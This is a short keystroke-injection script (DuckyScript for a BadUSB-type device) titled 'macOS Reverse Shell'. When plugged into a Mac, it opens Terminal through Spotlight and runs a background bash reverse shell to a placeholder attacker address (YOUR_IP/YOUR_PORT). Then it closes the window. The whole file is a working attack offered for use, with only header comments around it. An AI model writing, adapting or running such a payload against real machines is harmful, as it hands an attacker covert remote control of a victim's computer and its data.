REM =====================================================
REM Title: macOS Reverse Shell
REM Author: yogeshjoga
REM Target: macOS 10.15+
REM Category: Payload Installation
REM Description: Establishes a reverse shell
REM IMPORTANT: Replace YOUR_IP and YOUR_PORT before use
REM =====================================================

DELAY 1000
GUI SPACE
DELAY 500
STRING terminal
DELAY 500
ENTER
DELAY 1000
STRING bash -c 'bash -i >& /dev/tcp/YOUR_IP/YOUR_PORT 0>&1' &
ENTER
DELAY 500
STRING exit
ENTER
